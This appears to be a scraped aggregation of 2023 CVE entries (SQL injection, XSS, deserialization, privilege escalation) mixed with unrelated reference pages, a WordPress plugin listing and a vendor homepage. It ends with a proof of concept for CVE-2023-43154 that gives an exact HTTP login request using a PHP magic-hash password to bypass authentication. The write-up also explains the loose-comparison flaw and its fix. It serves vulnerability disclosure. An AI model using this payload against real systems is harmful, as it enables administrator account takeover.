SQL injection can exist in a newly created part of the JFinalcms background, and the parameters submitted by users are not filtered. As a result, special characters in parameters destroy the original logic of SQL statements. Attackers can use this vulnerability to execute any SQL statement.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-43192: cve_sql/jfinalcms_sql.md at main · etn0tw/cve_sql

Sourcecodester Toll Tax Management System v1 is vulnerable to SQL Injection.

CVE-2023-44047: SQLI-TollTax/README.md at main · xcodeOn1/SQLI-TollTax

Scylladb is a NoSQL data store using the seastar framework, compatible with Apache Cassandra. Authenticated users who are authorized to create tables in a keyspace can escalate their privileges to access a table in the same keyspace, even if they don't have permissions for that table. This issue has not yet been patched. A workaround to address this issue is to disable CREATE privileges on a keyspace, and create new tables on behalf of other users.

**Description**

**Impact**

This is a privilege escalation vulnerabilty. Authenticated users who are authorized to create tables in a keyspace can escalate their privileges to access a table in the same keyspace, even if they don't have permissions for that table.

**Patches**

Patches are yet to be posted.

**Workarounds**

A workaround is to disable CREATE privileges on a keyspace, and create new tables on behalf of other users.

**References**

N/A

CVE-2023-33972: Privilege escalation from having CREATE access on a keyspace to full permission on a table in that keyspace

SQL Injection vulnerability in Tianchoy Blog v.1.8.8 allows a remote attacker to obtain sensitive information via the id parameter in the login.php

\[CVE ID\]

CVE-2023-43381

\[PRODUCT\]

https://github.com/tianchoy/blog

\[VERSION\]

v1.8.8

\[PROBLEM TYPE\]

SQL Injection

\[DESCRIPTION\]

SQL Injection exists in tianchoy/blog through 2018-06-19 via the user parameter to login.php.

CVE-2023-43381: CVE-2023-43381

Deserialization of Untrusted Data in emlog pro v.2.1.15 and earlier allows a remote attacker to execute arbitrary code via the cache.php component.

CVE-2023-43291: CVE-2023-43291.md

The Modal Window plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 5.3.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

Last change on this file was 2915607, checked in by , 4 months ago

Update to version 5.3.5  

**File size:** 1.7 KB

Line

 

1

<?php

2

/\*\*

3

 \* Shortcode

4

 \*

5

 \* @package     Wow\_Plugin

6

 \* @copyright   Copyright (c) 2018, Dmytro Lobov

7

 \* @license     http://opensource.org/licenses/gpl-2.0.php GNU Public License

8

 \* @since       1.0

9

 \*/

10

11

12

if ( ! defined( 'ABSPATH' ) ) {

13

        exit;

14

}

15

16

extract( shortcode\_atts( array( 'id' \=> "" ), $atts ) );

17

global $wpdb;

18

$table  \= $wpdb\->prefix . 'wow\_' . $this\->plugin\['prefix'\];

19

$sSQL   \= $wpdb\->prepare( "select \* from $table WHERE id = %d", $id );

20

$result \= $wpdb\->get\_results( $sSQL );

21

22

if ( count( $result ) \> 0 ) {

23

24

        foreach ( $result as $key \=> $val ) {

25

                $param \= unserialize( $val\->param );

26

                $check \= $this\->check( $param, $id );

27

                if ( $check \=== false ) {

28

                        return false;

29

                }

30

31

                if ( empty( $val\->status ) ) {

32

                        return false;

33

                }

34

35

                include( 'partials/public.php' );

36

37

                $slug       \= $this\->plugin\['slug'\];

38

                $version    \= $this\->plugin\['version'\];

39

                $url\_asset  \= plugin\_dir\_url( \_\_FILE\_\_ );

40

                $pre\_suffix \= defined( 'SCRIPT\_DEBUG' ) && SCRIPT\_DEBUG ? '' : '.min';

41

42

                $url\_style \= $url\_asset . 'assets/css/style' . $pre\_suffix . '.css';

43

                wp\_enqueue\_style( $slug, $url\_style, null, $version );

44

45

                wp\_add\_inline\_style( $slug, $val\->style );

46

47

                $effects\_url \= $url\_asset . 'assets/js/jquery.effects' . $pre\_suffix . '.js';

48

                wp\_enqueue\_script( $slug . '-effects', $effects\_url, array( 'jquery' ), $version );

49

50

                $modal\_url \= $url\_asset . 'assets/js/jquery.modalWindow' . $pre\_suffix . '.js';

51

                wp\_enqueue\_script( $slug, $modal\_url, array( 'jquery' ), $version );

52

53

                $inline\_js \= 'jQuery(function() {jQuery("#wow-modal-overlay-' . $id . '").ModalWindow(' . $val\->script . '); });';

54

                wp\_add\_inline\_script( $slug, $inline\_js );

55

56

57

        }

58

59

}

**Note:** See TracBrowser for help on using the repository browser.

CVE-2023-5161: shortcode.php in modal-window/tags/5.3.5/public – WordPress Plugin Repository

Cross-site scripting vulnerability in Item List page of Welcart e-Commerce versions 2.7 to 2.8.21 allows a remote unauthenticated attacker to inject an arbitrary script.

Published:2023/09/22  Last Updated:2023/09/22

**Overview**

WordPress plugin "Welcart e-Commerce" contains multiple vulnerabilities.

**Products Affected**

*   Welcart e-Commerce versions 2.7 to 2.8.21

**Description**

WordPress plugin "Welcart e-Commerce" provided by Collne Inc. contains multiple vulnerabilities listed below.

*   **Unrestricted Upload of File with Dangerous Type (****CWE-434****)** - CVE-2023-40219
    
    CVSS v3
    
    CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N
    
    **Base Score: 2.7**
    
    CVSS v2
    
    AV:N/AC:L/Au:S/C:N/I:P/A:N
    
    **Base Score: 4.0**
    
*   **Path Traversal (****CWE-22****)** - CVE-2023-40532
    
    CVSS v3
    
    CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
    
    **Base Score: 4.3**
    
    CVSS v2
    
    AV:N/AC:L/Au:S/C:P/I:N/A:N
    
    **Base Score: 4.0**
    
*   **Cross-site Scripting in registration process of Item List page (****CWE-79****)** - CVE-2023-41233
    
    CVSS v3
    
    CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    
    **Base Score: 6.1**
    
    CVSS v2
    
    AV:N/AC:M/Au:N/C:N/I:P/A:N
    
    **Base Score: 4.3**
    
*   **Cross-site Scripting in Credit Card Payment Setup page (****CWE-79****)** - CVE-2023-41962
    
    CVSS v3
    
    CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    
    **Base Score: 6.1**
    
    CVSS v2
    
    AV:N/AC:M/Au:N/C:N/I:P/A:N
    
    **Base Score: 4.3**
    
*   **Cross-site Scripting in Item List page (****CWE-79****)** - CVE-2023-43484
    
    CVSS v3
    
    CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    
    **Base Score: 6.1**
    
    CVSS v2
    
    AV:N/AC:L/Au:N/C:N/I:P/A:N
    
    **Base Score: 4.3**
    
*   **SQL Injection in Item List page (****CWE-89****)** - CVE-2023-43493
    
    CVSS v3
    
    CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    
    **Base Score: 6.5**
    
    CVSS v2
    
    AV:N/AC:L/Au:S/C:P/I:N/A:N
    
    **Base Score: 4.0**
    
*   **SQL Injection in Order Data Edit page (****CWE-89****)** - CVE-2023-43610
    
    CVSS v3
    
    CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
    
    **Base Score: 5.4**
    
    CVSS v2
    
    AV:N/AC:L/Au:S/C:P/I:P/A:N
    
    **Base Score: 5.5**
    
*   **Cross-site Scripting in Order Data Edit page (****CWE-79****)** - CVE-2023-43614
    
    CVSS v3
    
    CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    
    **Base Score: 6.1**
    
    CVSS v2
    
    AV:N/AC:L/Au:N/C:N/I:P/A:N
    
    **Base Score: 4.3**
    

**Impact**

*   A user with editor or higher privilege may upload an arbitrary file to an unauthorized directory - CVE-2023-40219
*   A user with author or higher privilege may obtain partial information of the files on the web server - CVE-2023-40532
*   An arbitrary script may be executed on a logged-in user's web browser - CVE-2023-41233, CVE-2023-43484, CVE-2023-43614
*   When accessing a specially crafted page, an arbitrary script may be injected in Credit Card Payment Setup page - CVE-2023-41962
*   A user with author or higher privilege may obtain sensitive information - CVE-2023-43493
*   A user with editor (without setting authority) or higher privilege may perform unintended database operations - CVE-2023-43610

**Solution**

**Update the plugin**  
Update the plugin according to the information provided by the developer.  
The developer has released the following version that addresses these vulnerabilities.

*   Welcart e-Commerce 2.8.22

**Vendor Status**

**References**

**JPCERT/CC Addendum**

**Vulnerability Analysis by JPCERT/CC**

**Credit**

CVE-2023-40219  
Akihiro Hashimoto reported this vulnerability to IPA.  
JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.

CVE-2023-40532, CVE-2023-41233, CVE-2023-41962, CVE-2023-43484, CVE-2023-43493, CVE-2023-43610, CVE-2023-43614  
Shogo Kumamaru of LAC CyberLink Co., Ltd. reported these vulnerabilities to IPA.  
JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.

**Other Information**

CVE-2023-43484: Multiple vulnerabilities in WordPress plugin "Welcart e-Commerce"

Super Store Finder v3.6 and below was discovered to contain a SQL injection vulnerability via the Search parameter at /admin/stores.php.

CVE-2023-44044: Superstore-sql-poc/SQL at main · TishaManandhar/Superstore-sql-poc

DedeBIZ v6.2.11 was discovered to contain multiple remote code execution (RCE) vulnerabilities at /admin/file_manage_control.php via the $activepath and $filename parameters.

*   首页
*   下载
*   文档
*   商业支持
*   贡献者
*   服务
*   代码托管
*   联系我们

**免费商用，快速搭建企业、博客、商城开源站点**

DedeBIZ系统基于PHP7版本开发，具有很强的可扩展性，并且采用GPLv2协议完全开放源代码。DedeBIZ支持采用现流行的Go语言设计开发，拥有简单易用、灵活扩展特性之外更安全、高效。模板设计制作简单，一直是系统一大特点，延续之前标签，同时采用响应式模板引擎Bootstrap作为系统模板渲染引擎，让搭建跨终端和移动端全媒体站点更简单。

推荐环境：Nginx+PHP8.X+MySQL5.X 最新版本：6.2.12（2023-09-28） 下载程序

**下载程序**

我们需要先准备程序需要的运行环境，然后通过下载软件安装包或者通过源代码检出的方式来实现搭建系统。

前往下载

**技术服务**

DedeBIZ作为全新品牌，长达十年的技术沉淀作为您的技术补充，将为您带来安全、专业、可信赖的服务体验，值得拥有！

了解更多

**商业服务**

感谢对DedeBIZ系统的支持，您的购买是对知识产权的支持与尊重，更是为中国建站系统走向世界贡献力量。

授权申请

**贡献者**

注册加入DedeBIZ贡献者，个人和组织能够共同参与官方全新开源生态建设，互利共赢。

加入团队

**官方团队**

**天涯**

精通GO、PHP语言，十年技术沉淀。

**老岳**

资深高级UI设计师，十年设计经验沉淀。

**织梦猫**

专门提供DedeBIZ模板下载的网站。

**织梦帮**

专门提供DedeBIZ模板下载的网站。

**动态资讯**

**V6.2.7登场：数据共享无忧，构建互联万物新生态**

 天涯 2023年5月18日

大家期盼已久的V6.2.7发布了，这次更新的重点是新增了跨站数据调用功能，让数据共享更加简单。我们还对用户中心功能进行了优化，使现有系统成为集内容、互动和支付于一体的综合性系统。

**缅怀DedeCMS创始人林学先生**

 天涯 2022年12月4日

2022年12月3日下午DedeCMS创始人林学先生（IT柏拉图）因罹患癌症逝世。林学先生生于1979年10月10日，于2004年8月编写的DedeCMS至今仍有数十万企业、个人站长使用

CVE-2023-43234: 穆云智能科技 - DedeBIZ管理系统 - 我们致力于管理系统开源提供动力

In Macrob7 Macs Framework Content Management System (CMS) 1.1.4f, loose comparison in "isValidLogin()" function during login attempt results in PHP type confusion vulnerability that leads to authentication bypass and takeover of the administrator account.

**CVE-2023-43154 - Macs Framework v1.1.4f CMS Type Confusion Vulnerability****Table of Contents**

1.  Overview
2.  Proof of Concept
3.  Technical Debrief
4.  Mitigation

**Overview**

**CVE-ID**: CVE-2023-43154

**CVSS 3.1**: 9.8

**Vulnerability Description**: A loose comparison in the isValidLogin() function results in a PHP type confusion vulnerability that can be abused to bypass authentication and takeover the administrator account.

**Vulnerable Parameters**: The username and password of the users on the CMS.

**Affected Products**: Macs Framework v1.14f - Content Management System

**Limitations**:

1.  The username of the victim account must be previously known or a zero-like string
2.  The password used with the account must result in a "magic hash".

**User Interaction Required**: None

**References**: https://github.com/ally-petitt/CVE-2023-43154-PoC

**Discovery Date**: September 7, 2023

**Reported By**: Ally Petitt

**Proof of Concept**

Logging in at the URI /index.php/main/cms/login with the username of the victim account and any password that results in a magic hash will lead to authentication bypass.

A sample login is shown below.

**Send Payload**

    POST /index.php/main/cms/login HTTP/1.1
    Host: 172.17.0.2
    Content-Length: 62
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    Origin: http://172.17.0.2
    Referer: http://172.17.0.2/index.php/main/cms/login
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: PHPSESSID=di4ceqcv9432vcb0p27rkh7k82
    Connection: close
    
    ajaxRequest=true&&username=testadmin&password=0gdVIdSQL8Cm&scrollPosition=0
    

**HTTP Response**

    HTTP/1.1 200 OK
    Date: Sat, 09 Sep 2023 02:01:26 GMT
    Server: Apache/2.4.25 (Debian)
    X-Powered-By: PHP/5.6.40
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Vary: Accept-Encoding
    Content-Length: 72
    Connection: close
    Content-Type: text/html; charset=ISO-8859-1
    
    <script>window.location.href="http://172.17.0.2/index.php/home"</script>
    

The status code of 200 and the redirect to /index.php/home are both indications that the login attempt was successful. The password of testadmin was not the password used in the login attempt (0gdVIdSQL8Cm). Instead, it was set to QNKCDZO.

**Technical Debrief**

When a user attempts to log in, their supplied password is hashed and and sent as a parameter to the isValidLogin() function via the initial login() function that is called when a POST request is made to /index.php/Main/CMS/login.

        public function login()
        {      
          if($this->isValidLogin(Post::getByKey('username'), $this->encrypt(Post::getByKey('password')) ) || ( $this->isAdminLoggedIn() ))
          --snip--
        }
    

The isValidLogin() function begins on line 83 of file /Application/plugins/CMS/controllers/CMS.php. It is vulnerable to a type confusion vulnerability due to its use of 2 equal signs instead of 3.

        private function isValidLogin($username, $password)
        {
          $this->loadModels();
          
          $loggedIn = false;
    
          foreach (Config::$editInPlaceAdmins as $key=>$account)
          {
            if(( $account['username'] == $username) && ($account['password'] == $password ) )
            {
              $loggedIn = true;
              Session::set('AdminLoggedIn', $account);
              break;
            }
          }
    

As shown in the if statement, the username and password are being checked with a loose comparison, leading to a PHP type confusion vulnerability. This can be abused when logging in with a password that results in a magic hash, or hash that is interpretted by PHP to have the value 0 during a loose comparison. A list of such passwords can be found here.

To exploit this, it is important to first understand the format that $account['password'] is stored in. In the function used to save a new user account on line 730 of the aforementioned CMS.php file, it becomes clear that the password is first passed through an encrypt function before it is stored.

      $password = $this->encrypt(Post::getByKey('password'));
      $confirmPassword = $this->encrypt(Post::getByKey('confirmPassword'));
      -- snip --
      private function saveNewUser( $username, $password, $emailAddress, $roleId)
    

Continuing to the function that is called after the password is run through encrypt, the following code is used:

        private function saveNewUser( $username, $password, $emailAddress, $roleId)
        {
          --snip--
                $this->usersModel->insertUser($username, $password, $emailAddress, $roleId);
          --snip--
        }
    

Based on the code above, it is apparent that the "encrypted" password was placed directly into the users Model of the MVC framework. Finally, to exploit this vulnerability, it is necessary to understand how the encrypt function works as its output is being directly compared against the user input.

        private function encrypt( $string )
        {      
          return md5($string);
        }
    

The encrypt function returns the MD5 hash of the string passed to it. This means that when the login() function is called with the user-supplied credentials, the inputted password is hashed and compared against the stored MD5 hash of the victim account.

The implication is that when using a password that results in a PHP collision, or magic hash, it will register as being equivilent when compared against a stored password that also follows the format of a magic hash. As a result, a very large number of passwords can be used to authenticate to and takeover the administrator account, even when the initial password is not previously known.

**Mitigation**

This vulnerability can be mitigated by changing the loose comparison in the isValidLogin() function to a strict comparison by replacing == with ===.

CVE-2023-43154: GitHub - ally-petitt/CVE-2023-43154-PoC: PoC for the type confusion vulnerability in Mac's CMS that results in authentication bypass and administrator account takeover.

Tag

#sql